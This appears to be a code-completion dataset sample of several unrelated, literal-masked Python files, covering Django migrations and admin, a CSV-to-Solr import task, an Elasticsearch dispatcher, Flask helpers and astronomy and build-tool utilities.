, [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:filename>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:size>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:filename>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:size>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:message>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:None>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:type>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:url>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:None>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:filename>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:size>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:None>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:None>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:None>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:end>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:message>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:start>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:status>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:None>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] </s>
<s> import logging <EOL> from math import floor <EOL> import time <EOL> from csvkit import CSVKitReader <EOL> from django . conf import settings <EOL> from django . utils . translation import ugettext <EOL> from livesettings import config_value <EOL> from panda import solr , utils <EOL> from panda . exceptions import DataImportError <EOL> from panda . tasks . import_file import ImportFileTask <EOL> from panda . utils . typecoercion import DataTyper <EOL> SOLR_ADD_BUFFER_SIZE = <NUM_LIT> <EOL> class ImportCSVTask ( ImportFileTask ) : <EOL> """<STR_LIT>""" <EOL> name = '<STR_LIT>' <EOL> def _count_lines ( self , filename ) : <EOL> """<STR_LIT>""" <EOL> with open ( filename ) as f : <EOL> for i , l in enumerate ( f ) : <EOL> pass <EOL> return i + <NUM_LIT:1> <EOL> def run ( self , dataset_slug , upload_id , external_id_field_index = None , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> from panda . models import Dataset , DataUpload <EOL> log = logging . getLogger ( self . name ) <EOL> log . info ( '<STR_LIT>' % dataset_slug ) <EOL> try : <EOL> dataset = Dataset . objects . get ( slug = dataset_slug ) <EOL> except Dataset . DoesNotExist : <EOL> log . warning ( '<STR_LIT>' % dataset_slug ) <EOL> return <EOL> upload = DataUpload . objects . get ( id = upload_id ) <EOL> task_status = dataset . current_task <EOL> task_status . begin ( ugettext ( '<STR_LIT>' ) ) <EOL> line_count = self . _count_lines ( upload . get_path ( ) ) <EOL> if self . is_aborted ( ) : <EOL> task_status . abort ( '<STR_LIT>' ) <EOL> log . warning ( '<STR_LIT>' % dataset_slug ) <EOL> return <EOL> f = open ( upload . get_path ( ) , '<STR_LIT:r>' ) <EOL> reader = CSVKitReader ( f , encoding = upload . encoding , ** upload . dialect_as_parameters ( ) ) <EOL> reader . next ( ) <EOL> add_buffer = [ ] <EOL> data_typer = DataTyper ( dataset . column_schema ) <EOL> throttle = config_value ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> i = <NUM_LIT:0> <EOL> while True : <EOL> i += <NUM_LIT:1> <EOL> try : <EOL> row = reader . next ( ) <EOL> except StopIteration : <EOL> i -= <NUM_LIT:1> <EOL> break <EOL> except UnicodeDecodeError : <EOL> raise DataImportError ( ugettext ( '<STR_LIT>' ) % { '<STR_LIT>' : upload . encoding , '<STR_LIT>' : i } ) <EOL> external_id = None <EOL> if external_id_field_index is not None : <EOL> external_id = row [ external_id_field_index ] <EOL> data = utils . solr . make_data_row ( dataset , row , data_upload = upload , external_id = external_id ) <EOL> data = data_typer ( data , row ) <EOL> add_buffer . append ( data ) <EOL> if i % SOLR_ADD_BUFFER_SIZE == <NUM_LIT:0> : <EOL> solr . add ( settings . SOLR_DATA_CORE , add_buffer ) <EOL> add_buffer = [ ] <EOL> task_status . update ( ugettext ( '<STR_LIT>' ) % floor ( float ( i ) / float ( line_count ) * <NUM_LIT:100> ) ) <EOL> if self . is_aborted ( ) : <EOL> task_status . abort ( ugettext ( '<STR_LIT>' ) % floor ( float ( i ) / float ( line_count ) * <NUM_LIT:100> ) ) <EOL> log . warning ( '<STR_LIT>' % dataset_slug ) <EOL> return <EOL> time . sleep ( throttle ) <EOL> if add_buffer : <EOL> solr . add ( settings . SOLR_DATA_CORE , add_buffer ) <EOL> add_buffer = [ ] <EOL> solr . commit ( settings . SOLR_DATA_CORE ) <EOL> f . close ( ) <EOL> task_status . update ( '<STR_LIT>' ) <EOL> try : <EOL> dataset = Dataset . objects . get ( slug = dataset_slug ) <EOL> except Dataset . DoesNotExist : <EOL> log . warning ( '<STR_LIT>' % dataset_slug ) <EOL> return <EOL> if not dataset . row_count : <EOL> dataset . row_count = i <EOL> else : <EOL> dataset . row_count += i <EOL> dataset . column_schema = data_typer . schema <EOL> dataset . save ( ) <EOL> upload = DataUpload . objects . get ( id = upload_id ) <EOL> upload . imported = True <EOL> upload . save ( ) <EOL> log . info ( '<STR_LIT>' % dataset_slug ) <EOL> return data_typer </s>
<s> import datetime <EOL> from django . test import TestCase <EOL> from panda import solr as solrjson <EOL> class TestSolrJSONEncoder ( TestCase ) : <EOL> def test_datetime ( self ) : <EOL> v = { '<STR_LIT>' : datetime . datetime ( <NUM_LIT> , <NUM_LIT:4> , <NUM_LIT:11> , <NUM_LIT:11> , <NUM_LIT:3> , <NUM_LIT:0> ) } <EOL> self . assertEqual ( solrjson . dumps ( v ) , '<STR_LIT>' ) <EOL> def test_date ( self ) : <EOL> v = { '<STR_LIT:date>' : datetime . date ( <NUM_LIT> , <NUM_LIT:4> , <NUM_LIT:11> ) } <EOL> self . assertEqual ( solrjson . dumps ( v ) , '<STR_LIT>' ) <EOL> def test_time ( self ) : <EOL> v = { '<STR_LIT:time>' : datetime . time ( <NUM_LIT:11> , <NUM_LIT:3> , <NUM_LIT:0> ) } <EOL> self . assertEqual ( solrjson . dumps ( v ) , '<STR_LIT>' ) <EOL> def test_int ( self ) : <EOL> v = { '<STR_LIT:int>' : <NUM_LIT> } <EOL> self . assertEqual ( solrjson . dumps ( v ) , '<STR_LIT>' ) </s>
<s> import sys <EOL> import os <EOL> import os . path <EOL> import re <EOL> from elasticsearch import Elasticsearch <EOL> from time import sleep <EOL> from muppet import DurableChannel , RemoteChannel <EOL> esStopWords = [ "<STR_LIT:a>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:to>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> __name__ = "<STR_LIT>" <EOL> class AnnotationDispatcher : <EOL> def __init__ ( self , config , processingStartIndex , processingEndIndex ) : <EOL> self . config = config <EOL> self . logger = config [ "<STR_LIT>" ] <EOL> self . esClient = Elasticsearch ( config [ "<STR_LIT>" ] [ "<STR_LIT:host>" ] + "<STR_LIT::>" + str ( config [ "<STR_LIT>" ] [ "<STR_LIT:port>" ] ) ) <EOL> self . bagOfPhrases = { } <EOL> self . corpusIndex = config [ "<STR_LIT>" ] [ "<STR_LIT:index>" ] <EOL> self . corpusType = config [ "<STR_LIT>" ] [ "<STR_LIT:type>" ] <EOL> self . corpusFields = config [ "<STR_LIT>" ] [ "<STR_LIT>" ] <EOL> self . corpusSize = <NUM_LIT:0> <EOL> self . processorIndex = config [ "<STR_LIT>" ] [ "<STR_LIT:index>" ] <EOL> self . processorType = config [ "<STR_LIT>" ] [ "<STR_LIT:type>" ] <EOL> self . processorPhraseType = config [ "<STR_LIT>" ] [ "<STR_LIT:type>" ] + "<STR_LIT>" <EOL> self . processingPageSize = config [ "<STR_LIT>" ] <EOL> self . analyzerIndex = self . corpusIndex + "<STR_LIT>" <EOL> self . config [ "<STR_LIT>" ] = processingStartIndex <EOL> self . config [ "<STR_LIT>" ] = processingEndIndex <EOL> self . config [ "<STR_LIT>" ] = self . processingPageSize <EOL> self . totalDocumentsDispatched = <NUM_LIT:0> <EOL> self . documentsAnnotated = <NUM_LIT:0> <EOL> self . documentsNotAnnotated = <NUM_LIT:0> <EOL> self . lastDispatcher = False <EOL> self . endProcess = False <EOL> self . dispatcherName = "<STR_LIT>" <EOL> self . workerName = "<STR_LIT>" <EOL> self . timeout = <NUM_LIT> <EOL> if processingEndIndex != None : <EOL> self . dispatcherName += "<STR_LIT:.>" + str ( processingStartIndex ) + "<STR_LIT:.>" + str ( processingEndIndex ) <EOL> analyzerIndexSettings = { <EOL> "<STR_LIT:index>" : { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT:type>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> } <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT:type>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : config [ "<STR_LIT>" ] [ "<STR_LIT>" ] , <EOL> "<STR_LIT>" : config [ "<STR_LIT>" ] [ "<STR_LIT>" ] , <EOL> "<STR_LIT>" : ( config [ "<STR_LIT>" ] [ "<STR_LIT>" ] == <NUM_LIT:1> ) <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT:type>" : "<STR_LIT>" <EOL> } <EOL> } <EOL> } <EOL> } <EOL> } <EOL> analyzerIndexTypeMapping = { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : { "<STR_LIT:type>" : "<STR_LIT:string>" } , <EOL> "<STR_LIT>" : { "<STR_LIT:type>" : "<STR_LIT:string>" , "<STR_LIT:index>" : "<STR_LIT>" } , <EOL> "<STR_LIT>" : { "<STR_LIT:type>" : "<STR_LIT:string>" , "<STR_LIT:index>" : "<STR_LIT>" } <EOL> } <EOL> } <EOL> corpusSize = self . esClient . count ( index = self . corpusIndex , doc_type = self . corpusType , body = { "<STR_LIT>" : { "<STR_LIT>" : { } } } ) <EOL> self . corpusSize = corpusSize [ "<STR_LIT:count>" ] <EOL> self . featureNames = map ( lambda x : x [ "<STR_LIT:name>" ] , config [ "<STR_LIT>" ] [ "<STR_LIT>" ] ) <EOL> for module in config [ "<STR_LIT>" ] [ "<STR_LIT>" ] : <EOL> self . featureNames = self . featureNames + map ( lambda x : x [ "<STR_LIT:name>" ] , module [ "<STR_LIT>" ] ) <EOL> if processingStartIndex == <NUM_LIT:0> : <EOL> if self . esClient . indices . exists ( self . analyzerIndex ) : <EOL> self . esClient . indices . delete ( self . analyzerIndex ) <EOL> data = self . esClient . indices . create ( self . analyzerIndex , analyzerIndexSettings ) <EOL> if "<STR_LIT>" not in self . config or self . config [ "<STR_LIT>" ] == True : <EOL> try : <EOL> if self . esClient . indices . exists ( self . config [ "<STR_LIT>" ] [ "<STR_LIT:index>" ] ) : <EOL> self . esClient . indices . delete ( self . config [ "<STR_LIT>" ] [ "<STR_LIT:index>" ] ) <EOL> self . esClient . indices . create ( self . config [ "<STR_LIT>" ] [ "<STR_LIT:index>" ] ) <EOL> self . esClient . indices . put_mapping ( index = self . config [ "<STR_LIT>" ] [ "<STR_LIT:index>" ] , doc_type = self . processorPhraseType , body = analyzerIndexTypeMapping ) <EOL> if self . esClient . indices . exists ( self . analyzerIndex ) : <EOL> self . esClient . indices . delete ( self . analyzerIndex ) <EOL> data = self . esClient . indices . create ( self . analyzerIndex , analyzerIndexSettings ) <EOL> except : <EOL> error = sys . exc_info ( ) <EOL> self . logger . error ( "<STR_LIT>" + str ( error ) ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> else : <EOL> sleep ( <NUM_LIT:1> ) <EOL> self . annotationDispatcher = DurableChannel ( self . dispatcherName , config , self . timeoutCallback ) <EOL> self . controlChannel = RemoteChannel ( self . dispatcherName , config ) <EOL> def dispatchToAnnotate ( self ) : <EOL> if "<STR_LIT>" in self . config and self . config [ "<STR_LIT>" ] == False : return <EOL> nextDocumentIndex = <NUM_LIT:0> <EOL> if self . config [ "<STR_LIT>" ] != None : nextDocumentIndex = self . config [ "<STR_LIT>" ] <EOL> endDocumentIndex = - <NUM_LIT:1> <EOL> if self . config [ "<STR_LIT>" ] != None : endDocumentIndex = self . config [ "<STR_LIT>" ] <EOL> if endDocumentIndex != - <NUM_LIT:1> and self . processingPageSize > ( endDocumentIndex - nextDocumentIndex ) : <EOL> self . processingPageSize = endDocumentIndex - nextDocumentIndex + <NUM_LIT:1> <EOL> self . totalDocumentsDispatched = <NUM_LIT:0> <EOL> while True : <EOL> documents = self . esClient . search ( index = self . corpusIndex , doc_type = self . corpusType , body = { "<STR_LIT>" : nextDocumentIndex , "<STR_LIT:size>" : self . processingPageSize , "<STR_LIT>" : { "<STR_LIT>" : { } } , "<STR_LIT>" : [ { "<STR_LIT>" : { "<STR_LIT>" : "<STR_LIT>" } } ] } , fields = [ "<STR_LIT>" ] ) <EOL> if len ( documents [ "<STR_LIT>" ] [ "<STR_LIT>" ] ) == <NUM_LIT:0> : <EOL> break <EOL> self . totalDocumentsDispatched += len ( documents [ "<STR_LIT>" ] [ "<STR_LIT>" ] ) <EOL> self . logger . info ( "<STR_LIT>" + str ( nextDocumentIndex ) + "<STR_LIT>" + str ( nextDocumentIndex + len ( documents [ "<STR_LIT>" ] [ "<STR_LIT>" ] ) ) + "<STR_LIT>" ) <EOL> for document in documents [ "<STR_LIT>" ] [ "<STR_LIT>" ] : <EOL> self . logger . info ( "<STR_LIT>" + document [ "<STR_LIT>" ] ) <EOL> content = { "<STR_LIT>" : document [ "<STR_LIT>" ] , "<STR_LIT:type>" : "<STR_LIT>" , "<STR_LIT:count>" : <NUM_LIT:1> , "<STR_LIT>" : self . dispatcherName } <EOL> self . annotationDispatcher . send ( content , self . workerName ) <EOL> nextDocumentIndex += len ( documents [ "<STR_LIT>" ] [ "<STR_LIT>" ] ) <EOL> if endDocumentIndex != - <NUM_LIT:1> and endDocumentIndex <= nextDocumentIndex : <EOL> break <EOL> self . logger . info ( str ( self . totalDocumentsDispatched ) + "<STR_LIT>" ) <EOL> while True : <EOL> message = self . annotationDispatcher . receive ( ) <EOL> if "<STR_LIT>" in message [ "<STR_LIT:content>" ] and message [ "<STR_LIT:content>" ] [ "<STR_LIT>" ] > <NUM_LIT:0> : <EOL> self . documentsAnnotated += <NUM_LIT:1> <EOL> self . annotationDispatcher . close ( message ) <EOL> self . logger . info ( "<STR_LIT>" + message [ "<STR_LIT:content>" ] [ "<STR_LIT>" ] + "<STR_LIT>" + str ( self . documentsAnnotated ) + "<STR_LIT:/>" + str ( self . totalDocumentsDispatched ) ) <EOL> if ( self . documentsAnnotated + self . documentsNotAnnotated ) >= self . totalDocumentsDispatched and not self . lastDispatcher : <EOL> self . controlChannel . send ( "<STR_LIT>" ) <EOL> self . annotationDispatcher . end ( ) <EOL> break <EOL> self . __terminate ( ) <EOL> def timeoutCallback ( self , message ) : <EOL> if message [ "<STR_LIT:content>" ] [ "<STR_LIT:count>" ] < <NUM_LIT:5> : <EOL> message [ "<STR_LIT:content>" ] [ "<STR_LIT:count>" ] += <NUM_LIT:1> <EOL> self . annotationDispatcher . send ( message [ "<STR_LIT:content>" ] , self . workerName , self . timeout ) <EOL> else : <EOL> self . documentsNotAnnotated += <NUM_LIT:1> <EOL> if self . documentsNotAnnotated == self . totalDocumentsDispatched or ( self . documentsAnnotated + self . documentsNotAnnotated ) == self . totalDocumentsDispatched : <EOL> self . __terminate ( ) <EOL> def __terminate ( self ) : <EOL> self . logger . info ( str ( self . totalDocumentsDispatched ) + "<STR_LIT>" ) <EOL> self . logger . info ( str ( self . documentsAnnotated ) + "<STR_LIT>" ) <EOL> self . logger . info ( str ( self . documentsNotAnnotated ) + "<STR_LIT>" ) <EOL> self . logger . info ( "<STR_LIT>" ) <EOL> self . logger . info ( "<STR_LIT>" ) <EOL> def __deleteAnalyzerIndex ( self ) : <EOL> if self . esClient . indices . exists ( self . analyzerIndex ) : <EOL> self . esClient . indices . delete ( self . analyzerIndex ) </s>
<s> from flask import Flask , Response <EOL> from werkzeug . routing import BaseConverter , ValidationError <EOL> from base64 import urlsafe_b64encode , urlsafe_b64decode <EOL> from bson . objectid import ObjectId <EOL> from bson . errors import InvalidId <EOL> import datetime <EOL> import mmh3 <EOL> try : <EOL> import json <EOL> except ImportError : <EOL> import simplejson as json <EOL> try : <EOL> from bson . objectid import ObjectId <EOL> except : <EOL> pass <EOL> class APIEncoder ( json . JSONEncoder ) : <EOL> def default ( self , obj ) : <EOL> if isinstance ( obj , ( datetime . datetime , datetime . date ) ) : <EOL> return obj . ctime ( ) <EOL> elif isinstance ( obj , datetime . time ) : <EOL> return obj . isoformat ( ) <EOL> elif isinstance ( obj , ObjectId ) : <EOL> return str ( obj ) <EOL> return json . JSONEncoder . default ( self , obj ) <EOL> def jsonify ( data ) : <EOL> return Response ( json . dumps ( data , cls = APIEncoder ) , <EOL> mimetype = '<STR_LIT:application/json>' ) <EOL> class ObjectIDConverter ( BaseConverter ) : <EOL> def to_python ( self , value ) : <EOL> try : <EOL> return ObjectId ( urlsafe_b64decode ( value ) ) <EOL> except ( InvalidId , ValueError , TypeError ) : <EOL> raise ValidationError ( ) <EOL> def to_url ( self , value ) : <EOL> return urlsafe_b64encode ( value . binary ) <EOL> def genPrimaryKey64 ( data ) : <EOL> return "<STR_LIT>" % ( mmh3 . hash128 ( data ) & <NUM_LIT> ) </s>
<s> from ... utils import current_time <EOL> def observable ( target , observer ) : <EOL> """<STR_LIT>""" <EOL> if observer . target_is_up ( current_time ( ) , target , observer . horizon ) : <EOL> return ( <NUM_LIT:1> , True ) <EOL> return ( <NUM_LIT:0> , False ) <EOL> def moon_separation ( target , observer ) : <EOL> moon_sep = target . coord . separation ( observer . moon ) . value <EOL> if moon_sep < <NUM_LIT:15> : <EOL> return ( <NUM_LIT:0> , False ) <EOL> return ( moon_sep / <NUM_LIT> , True ) </s>
<s> import yaml <EOL> import os <EOL> import warnings <EOL> def load_config ( ) : <EOL> """<STR_LIT>""" <EOL> _config_file = '<STR_LIT>' . format ( os . getenv ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> _local_config_file = '<STR_LIT>' . format ( os . getenv ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> _config = dict ( ) <EOL> try : <EOL> with open ( _config_file , '<STR_LIT:r>' ) as f : <EOL> _config . update ( yaml . load ( f . read ( ) ) ) <EOL> except IOError as err : <EOL> warnings . warn ( '<STR_LIT>' . format ( err ) ) <EOL> try : <EOL> with open ( _local_config_file , '<STR_LIT:r>' ) as f : <EOL> _config . update ( yaml . load ( f . read ( ) ) ) <EOL> except IOError as err : <EOL> pass <EOL> return _config </s>
<s> from django . contrib import admin <EOL> from currencies . models import Currency <EOL> class CurrencyAdmin ( admin . ModelAdmin ) : <EOL> list_display = ( "<STR_LIT:name>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:code>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> list_filter = ( "<STR_LIT>" , ) <EOL> search_fields = ( "<STR_LIT:name>" , "<STR_LIT:code>" ) <EOL> admin . site . register ( Currency , CurrencyAdmin ) </s>
<s> from __future__ import ( absolute_import , division , generators , nested_scopes , print_function , <EOL> unicode_literals , with_statement ) <EOL> from pants . task . task import Task <EOL> from pants . contrib . android . distribution . android_distribution import AndroidDistribution <EOL> class AndroidTask ( Task ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def register_options ( cls , register ) : <EOL> super ( AndroidTask , cls ) . register_options ( register ) <EOL> register ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( AndroidTask , self ) . __init__ ( * args , ** kwargs ) <EOL> self . _sdk_path = self . get_options ( ) . sdk_path or None <EOL> @ property <EOL> def android_sdk ( self ) : <EOL> """<STR_LIT>""" <EOL> return AndroidDistribution . cached ( self . _sdk_path ) </s>
